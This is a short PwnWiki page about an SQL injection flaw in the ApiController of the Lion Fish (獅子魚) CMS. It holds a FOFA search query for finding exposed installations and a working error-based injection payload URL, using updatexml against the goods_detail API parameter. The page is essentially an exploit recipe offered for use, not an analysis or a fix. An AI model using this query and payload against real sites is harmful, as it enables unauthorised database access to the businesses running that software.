獅子魚CMS ApiController.class.php SQL注入漏洞

From PwnWiki

Revision as of 10:19, 16 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "/seller.php?s=/Public/login" </pre> ==Payload== <pre> https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

"/seller.php?s=/Public/login"

Payload

https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)

Retrieved from "https://pwnwiki.com/index.php?title=獅子魚CMS_ApiController.class.php_SQL注入漏洞&oldid=2869"